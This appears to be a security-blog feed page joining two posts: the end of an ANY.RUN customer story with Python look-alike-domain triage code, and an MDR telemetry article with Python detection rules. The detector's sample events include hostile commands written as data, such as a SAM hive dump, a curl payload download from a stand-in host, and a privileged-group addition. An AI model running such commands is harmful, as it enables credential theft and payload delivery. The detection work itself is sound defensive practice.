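    # Rule 2: an 'o365' / '0365' label on a registrable domain Microsoft does not own.
    if MS365_LABEL.search(host) and reg not in MS_OWNED:
        kind = "digit-zero homoglyph" if "0365" in host else "look-alike label"
        reasons.append(f"{kind} 'o365' on '{reg}'")
    return reasons


def triage(hosts):
    """Map each suspicious host in a batch to its reasons; clean hosts are dropped."""
    report = {}
    for h in hosts:
        reasons = check_domain(h)
        if reasons:
            report[h] = reasons
    return report


# Constructed sample: a mix of genuine hosts and look-alikes, as they might arrive
# from a TI Lookup result export or a proxy log.
SAMPLE_HOSTS = [
    "www.google.com",             # genuine
    "google.com.a1b2.xyz",        # brand as left-hand labels, registered as a1b2.xyz
    "login.microsoftonline.com",  # genuine
    "portal.0365.net",            # zero instead of the letter o
    "login.o365-secure.top",      # look-alike label on an unrelated domain
    "o365.example-corp.com",      # allowlisted internal host
]

if __name__ == "__main__":
    for host, reasons in triage(SAMPLE_HOSTS).items():
        print(f"{host}: {'; '.join(reasons)}")
```

The point of the registrable-domain step is that a hostname beginning with a trusted brand proves nothing; only the suffix the registrant actually controls does.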

Impact on Security 

In terms of the company’s security, TI Lookup provides us with some of the latest threat intelligence we can get. We can apply it immediately while indicators are still active to identify threats and protect the organization’s infrastructure in advance. 

It also improves our awareness of the threat landscape, letting us track a wider array of attacks. We now have more data on a broader pool of threats than ever before and can identify the ones that are still ongoing and those that are no longer active. 

Impact on Operations 

If we’re talking about the team’s performance, the productivity definitely went up after we began using Query Subscriptions. Back in the day, we had to allocate a lot of time and staff to follow up on attacks that were relevant to us. This was a lot of manual work. I’m not saying that we no longer do it, but receiving Search Updates definitely made the process much easier.  

We now get automated updates and can actually focus on more threats than before, because we no longer need to rely on guesswork in deciding which attacks will be more likely to affect us. 

Now we simply create a query and hit subscribe. The more new results we see arriving for a particular threat in TI Lookup the higher priority it gets. 

Team Feedback 

Most of the team are well familiar with the ANY.RUN sandbox, so adopting TI Lookup felt natural for them. It was with some of the new folks on the team that we had to work a little harder to get them to a place where they could comfortably use the service. They mostly struggled with the query parameters and their meanings, as well as with the tags in the sandbox, which are the same in TI Lookup. But most of them managed to become fairly proficient in a week or two. 

Conclusion 

We want to thank the guest for taking the time to share their story and real-world examples of using TI Lookup. The behind-the-scenes view of a threat hunting team’s work is always a rare privilege, and we really appreciate it. Our hope is that this article will help other users who are considering integrating the service into their organization lay the groundwork for a successful implementation.  

As always, if you are open to letting others know how your team uses ANY.RUN’s products, we’ll be happy to hear from you at support@any.run.

About ANY.RUN

ANY.RUN helps more than 500,000 cybersecurity professionals worldwide. Our interactive sandbox simplifies malware analysis of threats that target both Windows and Linux systems. Our threat intelligence products, TI Lookup, YARA Search, and Feeds, help you find IOCs or files to learn more about the threats and respond to incidents faster.

The post How Transport Company Gets Real-Time IOC and IOB Updates on Active Cyber Attacks appeared first on ANY.RUN’s Cybersecurity Blog.

ANY.RUN’s Cybersecurity Blog – Read More

What to collect on computers for monitoring complex threats

To effectively counter cyberthreats that circumvent basic security measures, a managed detection and response (MDR) service must ensure the right data collection tools are in place in the protected organization from the start. In addition, the service team and the client team should regularly discuss how to improve telemetry collection, and what other data should be collected in order to stay ahead of evolving attacker tactics. Our experts not only advise clients on proper data collection, but also closely monitor the changing threat landscape to continuously refine the process. Our latest MDR service report details incidents in client infrastructures and the tactics attackers have used. A dedicated section of the report covers the most frequently triggered detection rules in 2024, and what’s required for them to function effectively.

Dumping registry hives

Among the suspicious operations frequently detected in high-severity incidents, the most common by far is the extraction of security-critical data from the system registry (dumping of sensitive registry hives). This activity was observed in 27% of high-severity incidents.

To detect such extraction, the MDR provider must have telemetry from an EDR system installed on all computers and servers in the protected organization. If there’s an endpoint protection system (EPP) that can detect suspicious (not necessarily malicious) activity, this can also serve as a source of the necessary data. An event that most definitely should be logged is registry access.

Malicious code in memory

Many attacks occur in such a way that malicious files are never stored on the hard drive. However, an endpoint protection system can detect malicious code in the memory of a system process or another memory segment. This occurred in 17% of high-severity incidents, and such events from the EPP must be instantly visible to the MDR service.

Suspicious services

The creation and execution of Windows services containing suspicious arbitrary code is a strong indicator of an unfolding cyberattack. This was also detected in nearly 17% of high-severity incidents. To detect this activity, telemetry must include OS system events, process launch information, and the complete contents of all startup lists.

Access to a malicious host

Though seemingly simple, this event appeared in 12% of high-severity incidents, and requires an up-to-date IP reputation database for detection. In a company’s infrastructure, access attempts can be tracked in multiple ways: EPP detection, network-level monitoring, and DNS/HTTP request analysis. The MDR provider can also use threat intelligence databases to enrich the client’s telemetry.

Memory fragment dumps

To escalate an attack within a victim’s network after the initial compromise, attackers often try to obtain credentials on an infected machine. If they get lucky, these may be network administrator credentials, allowing them to quickly take over servers. A classic technique for achieving this is extracting and saving memory fragments related to the LSASS (Local Security Authority Subsystem Service). In 2024, we detected this technique in nearly 12% of high-severity incidents.

Attempts to capture LSASS memory can be detected in multiple ways: using certain EPP and EDR rules, analyzing command-line parameters when launching applications, scripts and processes, and monitoring access to LSASS.

Executing a low-reputation object

Although a file, script, or document may not be definitively malicious, if it was previously observed in suspicious activity, MDR specialists must check whether a cyberattack is underway. This requires telemetry that logs processes launching suspicious files. And, of course, threat intelligence is needed to flag the file’s bad reputation. Execution of low-reputation objects was observed in 10% of high-severity incidents.

Adding privileged users

Beyond stealing administrator accounts, attackers often create their own accounts and then elevate their privileges. In 9% of high-severity incidents, an account was added to a privileged corporate domain group. To detect this, OS event collection must capture all account modifications.

Remote process execution

In over 5% of incidents, there was a process involved that was launched by a remote user. To monitor such events, computers must log process launch events and the loading of executable file sections into memory.

Malicious address in event parameters

In any event parameters — but most commonly in the command line of the running process — a known malicious URL may appear. This was observed in nearly 5% of high-severity incidents, making it crucial to always include detailed parameters of logged events, including the full command line, in the telemetry. For MDR providers, such detection is only possible with access to a large URL-reputation database (which we, of course, have).

Telemetry sources

Above, we’ve highlighted the most critical events that help an MDR team detect and prevent serious incidents. The full report covers additional events and a deeper analysis of attacker tactics. The list above makes it clear what types of data must be transmitted to an MDR service in real time for it to work effectively. First and foremost, this includes:

  • Telemetry from endpoint protection solutions (EPP) or EDR agents. In today’s organizations, traditional “antivirus” and detection and response tools are often integrated into a single product. This provides key telemetry from computers and servers, so its presence is essential on all machines, along with the configuration of detailed event logging in collaboration with the MDR team.
  • OS events. Properly configured Windows logs provide critical information about account manipulations, process launches and terminations, and more. On Linux systems, the same role is played by Audit Daemon (aka auditd). Special attention must be given to configuring logging on all of the organization’s servers. Detailed recommendations for settings for Windows can be found in our knowledge base. The Sysmon tool from the Microsoft Sysinternals suite enhances the effectiveness of Windows logs.
  • Events from network devices. It’s critical to configure detailed logging on network devices — primarily firewalls and web filters, but also routers, proxies, and DNS servers if used in the company.
  • Cloud environment logs. Attackers frequently compromise cloud infrastructure and SaaS tools, where the previously mentioned logs are typically not available. Therefore, it’s essential to set up comprehensive security-focused logging using cloud-native tools, such as AWS CloudTrail.
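To make the dependency between the detections above and the telemetry concrete, here is an added example (not Kaspersky’s MDR logic): a small Python pass that applies five of the described detections (hive dumping, LSASS memory access, suspicious service installation, privileged group additions, and malicious URLs in command lines) to endpoint events. It assumes the events have already been normalized into dicts carrying standard Windows Security and Sysmon fields (4688 process creation, Sysmon event 10 process access, 7045 service installed, 4728/4732 group membership added); the allowlist, the reputation set and all sample records are constructed.

```python
import re

# --- Rule parameters: assumptions standing in for a real MDR rule base --------------
# reg.exe saving or exporting the hives that hold credential material.
HIVE_DUMP = re.compile(r"\breg(?:\.exe)?\s+(?:save|export)\s+\S*\\(?:sam|security|system)\b", re.I)
# Service images that are really interpreters/scripts, or that live in user-writable dirs.
INTERPRETERS = re.compile(
    r"\b(?:cmd|powershell|pwsh|wscript|cscript|mshta|rundll32)(?:\.exe)?\b|\.(?:bat|ps1|vbs|js)\b", re.I)
USER_WRITABLE = re.compile(r"^[a-z]:\\(?:users|programdata|windows\\temp)\\", re.I)
PRIVILEGED_GROUPS = {"domain admins", "enterprise admins", "schema admins", "administrators"}
PROCESS_VM_READ = 0x0010                                  # right needed to read another process's memory
LSASS_READERS_OK = {r"c:\windows\system32\taskmgr.exe"}  # hypothetical allowlist of known LSASS readers
BAD_URLS = {"http://malicious.example/stage2"}           # stand-in for a URL-reputation feed
URL_RE = re.compile(r"https?://[^\s\"'<>]+")


def hive_dump(ev):
    """4688 process creation whose command line saves/exports SAM, SECURITY or SYSTEM."""
    return ev.get("EventID") == 4688 and HIVE_DUMP.search(ev.get("CommandLine", "")) is not None


def lsass_access(ev):
    """Sysmon 10: a non-allowlisted process opens lsass.exe with memory-read rights."""
    if ev.get("EventID") != 10 or not ev.get("TargetImage", "").lower().endswith("\\lsass.exe"):
        return False
    if ev.get("SourceImage", "").lower() in LSASS_READERS_OK:
        return False
    return (int(ev.get("GrantedAccess", "0x0"), 16) & PROCESS_VM_READ) != 0


def suspicious_service(ev):
    """7045: a new service whose image is a script/interpreter or sits in a user-writable path."""
    path = ev.get("ImagePath", "")
    return ev.get("EventID") == 7045 and bool(INTERPRETERS.search(path) or USER_WRITABLE.match(path))


def privileged_group_add(ev):
    """4728/4732: a member added to a privileged domain or local group."""
    return ev.get("EventID") in (4728, 4732) and ev.get("GroupName", "").lower() in PRIVILEGED_GROUPS


def malicious_url(ev):
    """Any event whose command line carries a URL the reputation set knows as bad."""
    return any(u.rstrip(").,") in BAD_URLS for u in URL_RE.findall(ev.get("CommandLine", "")))


RULES = {
    "registry_hive_dump": hive_dump,
    "lsass_memory_access": lsass_access,
    "suspicious_service_install": suspicious_service,
    "privileged_group_add": privileged_group_add,
    "malicious_url_in_commandline": malicious_url,
}


def detect(ev):
    """Names of the rules one normalized event triggers."""
    return [name for name, rule in RULES.items() if rule(ev)]


def run(events):
    """(Computer, EventID, rules) for every event that triggered at least one rule."""
    findings = []
    for ev in events:
        hits = detect(ev)
        if hits:
            findings.append((ev.get("Computer", "?"), ev.get("EventID"), hits))
    return findings


# Constructed sample telemetry: each suspicious record is paired with a benign look-alike.
SAMPLE_EVENTS = [
    {"EventID": 4688, "Computer": "WS-17", "CommandLine": r"reg.exe save HKLM\SAM C:\Users\Public\sam.hiv"},
    {"EventID": 4688, "Computer": "WS-17", "CommandLine": r"reg.exe query HKCU\Software\Microsoft\Office"},
    {"EventID": 10, "Computer": "SRV-02", "SourceImage": r"C:\Users\Public\tool.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"},
    {"EventID": 10, "Computer": "SRV-02", "SourceImage": r"C:\Windows\System32\taskmgr.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1400"},
    {"EventID": 7045, "Computer": "SRV-02", "ServiceName": "UpdSvc", "ImagePath": r"C:\ProgramData\upd\run.bat"},
    {"EventID": 7045, "Computer": "SRV-02", "ServiceName": "Spooler", "ImagePath": r"C:\Windows\System32\spoolsv.exe"},
    {"EventID": 4728, "Computer": "DC-01", "GroupName": "Domain Admins", "MemberName": "svc-backup2"},
    {"EventID": 4688, "Computer": "WS-17", "CommandLine": r"curl.exe -o C:\Users\Public\u.exe http://malicious.example/stage2"},
]

if __name__ == "__main__":
    for computer, event_id, hits in run(SAMPLE_EVENTS):
        print(f"{computer} event {event_id}: {', '.join(hits)}")
```

Every rule reads a field that only arrives if the collection described above is configured: the full command line for 4688, GrantedAccess from Sysmon, and the image path from the service-installation event.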
